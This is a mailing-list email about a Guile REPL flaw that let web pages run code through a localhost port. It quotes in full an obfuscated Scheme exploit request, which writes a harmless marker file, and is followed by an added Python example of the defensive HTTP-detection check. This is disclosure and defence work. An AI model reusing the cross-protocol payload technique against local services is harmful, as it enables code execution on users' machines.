From: Lizzie Dixon <_@lizzie.io>
Newsgroups: gmane.lisp.guile.devel,gmane.lisp.guile.user
Subject: Re: Guile security vulnerability w/ listening on localhost + port (with fix)
Date: Sun, 16 Oct 2016 18:39:30 -0700
Message-ID: <20161017013930.GA12121@lizzie.io>
References: <87k2dfc7dd.fsf@dustycloud.org> <20161014215551.GA31883@lizzie.io> <87lgxo9vx8.fsf@dustycloud.org>
To: Christopher Allan Webber
Cc: guile-user@gnu.org, guile-devel@gnu.org
In-Reply-To: <87lgxo9vx8.fsf@dustycloud.org>

Hi Christopher,

On 10/16, Christopher Allan Webber wrote:
> So, I guess this will work from a public site as well?

Yes! The HTML I mentioned in my post is available here: (Though note
that it won't work if you visit it over HTTPS, since HTTPS documents
aren't allowed to XHR to HTTP.)

If you visit it while a guile 2.0.13 repl is listening on 37146, you'll
see this:

[lizzie@empress b.l.i]$ guile --listen
GNU Guile 2.0.13
Copyright (C) 1995-2016 Free Software Foundation, Inc.

Guile comes with ABSOLUTELY NO WARRANTY; for details type `,show w'.
This program is free software, and you are welcome to redistribute it
under certain conditions; type `,show c' for details.

Enter `,help' for help.
scheme@(guile-user)> 
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@ POSSIBLE BREAK-IN ATTEMPT ON THE REPL SERVER                @@
@@ BY AN HTTP INTER-PROTOCOL EXPLOITATION ATTACK.  See:        @@
@@                                                             @@
@@ Possible HTTP request received: "GET /?(let((ascii(((lambda(x)x)reverse)(((lambda(x)x)char-set-fold)((lambda(x)x)cons)(((lambda(x)x)make-list)((lambda(x)x)0))((lambda(x)x)char-set:ascii)))))(((lambda(x)x)with-output-to-file)(((lambda(x)x)string)(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)110))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)111))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)101))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)46))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)120))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)116)))(lambda()(((lambda(x)x)display)(((lambda(x)x)string)(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)62))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)58))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)41))(((lambda(x)x)list-ref)((lambda(x)x)ascii)((lambda(x)x)10))))))) HTTP/1.1\r\nHost: localhost:37146\r\nConnection: keep-alive\r\nOrigin: http://s3-us-west-2.amazonaws.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36\r\nAccept: */*\r\nReferer: http://s3-us-west-2.amazonaws.com/blog.lizzie.io/exploiting-CVE-2016-8606-exploit.html\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8\r\n\r\n" @@
@@ The associated socket has been closed.                      @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

I don't recommend visiting it while a 2.0.12 repl is open, but it will
write a file in that case.

> I'm always a bit fuzzy about what browsers do and don't allow, but
> I'm stunned that a browser will let a request from some
> http://foo.example/ to http://localhost:37146/, even for just a GET.
> It seems like there are all sorts of daemons you can exploit that
> way.

It's a little absurd, yeah. :/ Maybe this string of exploits will
convince others to reconsider, but probably this kind of vulnerability
will be around for a while.

Thanks,
Lizzie.
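The 2.0.13 transcript above shows the defensive check that makes the difference between the two Guile versions: a REPL listener that is about to evaluate whatever arrives on the socket first looks at the initial bytes and refuses the connection if they form an HTTP request line. The block below is an added example written for this thread; it is not Guile's own implementation and not code from the email. It models the same check in Python on a peeked socket preamble, plus extraction of the Origin header for logging. The function names, the regular expression and the sample inputs (`BROWSER_REQUEST`, `REPL_INPUT`) are constructed for the example.

```python
import re
import socket
from typing import Optional

# Heuristic for the first bytes read from a freshly accepted REPL connection.
# A browser-initiated cross-protocol request always begins with an HTTP
# request line: method, space, request-target, space, "HTTP/1.x".  Matching
# only the method and the following space means a request whose target is
# longer than the peeked buffer (the query string can carry a large payload,
# as in the transcript above) is still caught.  Interactive Scheme input does
# not start this way, so a false positive costs at most one closed connection.
HTTP_METHOD_PREFIX = re.compile(
    rb"^(?:GET|HEAD|POST|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT) \S"
)

# Message sent back before closing; wording modelled on the Guile banner.
BANNER = (
    b"POSSIBLE BREAK-IN ATTEMPT ON THE REPL SERVER "
    b"BY AN HTTP INTER-PROTOCOL EXPLOITATION ATTACK. "
    b"The associated socket has been closed.\n"
)

# Constructed sample: the shape of the GET a browser sends to the loopback
# REPL port from a plain-HTTP page (compare the request in the transcript).
BROWSER_REQUEST = (
    b"GET /?(display 42) HTTP/1.1\r\n"
    b"Host: localhost:37146\r\n"
    b"Origin: http://foo.example\r\n"
    b"\r\n"
)

# Constructed sample: what a legitimate REPL client sends.
REPL_INPUT = b"(+ 1 2)\n"


def looks_like_http_request(preamble: bytes) -> bool:
    """True if the initial bytes on a REPL socket form an HTTP request line."""
    return HTTP_METHOD_PREFIX.match(preamble) is not None


def http_origin(preamble: bytes) -> Optional[bytes]:
    """Pull the Origin header out of a peeked HTTP preamble, for the log line."""
    m = re.search(rb"\r\nOrigin: ([^\r\n]+)", preamble, re.IGNORECASE)
    return m.group(1) if m else None


def screen_connection(conn: socket.socket) -> bool:
    """Inspect a new REPL connection without consuming its bytes.

    Returns True if the connection may be handed to the REPL reader, False if
    it looked like HTTP and has been closed.
    """
    preamble = conn.recv(4096, socket.MSG_PEEK)  # leave bytes for the REPL
    if looks_like_http_request(preamble):
        origin = http_origin(preamble) or b"<no Origin header>"
        print("rejected HTTP request on REPL socket, Origin:", origin.decode(errors="replace"))
        try:
            conn.sendall(BANNER)
        except OSError:
            pass
        conn.close()
        return False
    return True


def simulate(client_bytes: bytes) -> bool:
    """Push bytes into one end of a socket pair and screen the other end."""
    server_side, client_side = socket.socketpair()
    try:
        client_side.sendall(client_bytes)
        return screen_connection(server_side)
    finally:
        client_side.close()
        if server_side.fileno() != -1:  # not already closed by the screen
            server_side.close()


if __name__ == "__main__":
    print("browser request accepted:", simulate(BROWSER_REQUEST))  # False
    print("repl input accepted:", simulate(REPL_INPUT))            # True
```

`MSG_PEEK` is what lets the check sit in front of an unmodified REPL reader: a connection that passes is handed over with its first bytes still in the kernel buffer. The check only closes the door on the browser-delivered request; the larger lesson of the thread, that a loopback listener is reachable from any HTTP page the user opens, is the reason to treat such listeners as untrusted input rather than as local-only.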